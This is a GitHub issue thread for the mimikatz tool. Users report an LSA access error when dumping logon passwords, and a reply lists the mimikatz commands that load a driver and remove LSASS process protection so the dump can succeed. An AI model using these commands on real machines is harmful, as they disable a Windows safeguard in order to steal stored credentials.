gentilkiwi / mimikatz

A little tool to play with Windows security

Home Page:http://blog.gentilkiwi.com/mimikatz

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

ERROR kuhl_m_sekurlsa_acquireLSA

jaysharma786 opened this issue · comments

I am using Invoke-mimikatz.ps1
i am get this error

mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations

I need to know why this error occur?
how to resolve this error?

Hi,
I'm also using the latest version of mimikatz on windows 10 21H2, few days it was working fine but since yesterday getting the same error like the one Jay is getting. Can you please let us know is this something known to you

Im also having this error now in Win 1909.
Why ?

Oh my.
You should run
privilege::debug
!+
!processprotect /process:lsass.exe /remove

to remove lsass protection.
At end ,run
!-
to. uninstall the driver.